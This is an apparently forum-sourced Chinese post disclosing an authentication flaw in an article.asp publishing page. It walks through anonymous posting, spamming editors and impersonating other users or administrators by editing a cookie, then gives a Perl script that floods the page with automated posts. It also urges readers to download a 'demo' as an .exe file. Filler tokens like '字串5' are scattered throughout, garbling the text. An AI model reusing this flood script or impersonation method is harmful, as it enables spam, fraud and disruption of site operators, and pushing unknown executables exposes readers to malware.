这个漏洞出现在:个人专栏-发表我的文章,当用户登陆后,点发表我的
字串1
字串1
文章时,有个文本框出现的是你的登陆名,发表文章是以你的 字串2
名义的,但由于这个article.asp缺少认证,我们不必登陆直接提交如下url,
字串8
这时你可以匿名发表文章给各个主编:
字串5
http://127.0.0.1/1/article.asp?action=add
字串5
字串9
这样在查看数据库中的article_add表中的username栏时为空,也就是不能只 字串1
字串7
知道是谁发的,即使你发表一些过激的言论管理员也不能拿你 字串5
怎么样,不能禁用你的帐号。 字串1
字串6
要命的是程序对用户发表文章的间隔也没有限制,我写了个程序,是在本
字串6
字串8
机测试的,一分钟能刷几百封,而且是匿名的,如果放在十台机上
跑一天,你算一下在文栏管理-网友发布中要收到多少投稿,这不是影响了文
栏主编的正常工作。 字串4
更要命的是还有一招借刀杀人,username栏时不为空,而是用别人的名字
字串1
字串3
,这个方法是以你的名义先登陆,然后修改cookie中的用户名 字串1
为你要冒充发言的人,然后直接提交如下url:
字串9
http://127.0.0.1/1/article.asp?action=add 其中的127.0.0.1/1/要改为 字串3
字串6
网站article.asp的真实路径,这样你可以看到文本框中出现的
就是你要冒充的人的名字了,查看数据库中的article_add表中的username栏 字串5
字串8
就是这个人说的了,你可以冒充管理员给各文栏主编下命令了。 字串1
我做了个演示动画,大家可以下一个看看,动画也演示了炸弹的威力! 字串1
下载地址: 字串1
字串1
http://members.lycos.co.uk/zhuoqing/king.exe 字串5
注意: 一定要用flashget下,ie下不了 字串8
字串9
已下是动画教程中涉及到的Exploit 字串4
#!/usr/bin/perl
字串5
# code by pinkeyes 字串5
print "pinkeyes is your best friend\n";
字串2
print "welcome to 海洋顶端网,and http://xiaomutou.51.net/bbs/\n";
use HTTP::Request::Common; 字串2
use HTTP::Response;
use LWP::UserAgent; 字串3
字串1
$ua = new LWP::UserAgent; 字串8
$ARGC = @ARGV; 字串7
if ($ARGC != 1) {
字串2
print "usage: $0 <times>"; 字串9
exit(1);
} 字串6
字串5
$times = shift;
字串5
for($k=1;$k<=100 * $times;$k++){
字串2
for ($j=1;$j<=$times;$j++){
字串9
for ($i=1;$i<=$times;$i++) {
字串3
$response = $ua->request(POST 'http://127.0.0.1//1//article.asp?action=chk', 字串9
[ 字串4
csid => "$j-$i",
topic => '漏洞演示', 字串7
word =>'fire in the hole', 字串5
login_username => 'pinkeyes'
字串5
]
); 字串3
if ($response->content =~ /已成功发布了一篇文章/) { 字串1
print "mail $i reg succeed!\n";
字串4
}
字串6
else { 字串9
print "mail $i reg failed!\n";
}
}
} 字串6
} 字串1
字串9
